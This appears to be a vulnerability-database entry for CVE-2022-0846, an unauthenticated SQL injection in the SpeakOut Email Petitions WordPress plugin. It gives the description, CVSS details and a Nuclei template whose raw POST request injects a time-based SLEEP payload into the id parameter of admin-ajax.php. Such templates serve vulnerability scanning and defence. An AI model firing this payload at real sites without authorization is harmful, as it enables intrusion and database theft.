CVE-2022-0846: SpeakOut Email Petitions < 2.14.15.1 - SQL Injection

日期: 2025-08-01 | 影响软件: SpeakOut Email Petitions | POC: 已公开

漏洞描述

The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users.

PoC代码[已公开]

id: CVE-2022-0846

info:
  name: SpeakOut Email Petitions < 2.14.15.1 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Fixed in version 2.14.15.1
  reference:
    - https://wpscan.com/vulnerability/b030296d-688e-44a4-a48a-140375f2c5f4
    - https://wordpress.org/plugins/speakout/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0846
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/DharmaDoll/Search-Poc-from-CVE
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0846
    cwe-id: CWE-89
    epss-score: 0.50366
    epss-percentile: 0.97768
    cpe: cpe:2.3:a:speakout\!_email_petitions_project:speakout\!_email_petitions:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: speakout\!_email_petitions_project
    product: speakout\!_email_petitions
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "Your signature has been added") || contains(body, "This petition has already been signed using your email address")'
        condition: and
# digest: 490a0046304402204d4bec403f3a8648e8e3acd096d6f8934eeb868c55cee021aa2770daa6347fdc02206bc7fac1d9a409b364ccb28eddbe9fef8218ce16f378b7c87cb8624b41795082:922c64590222798bb761d5b6d8e72950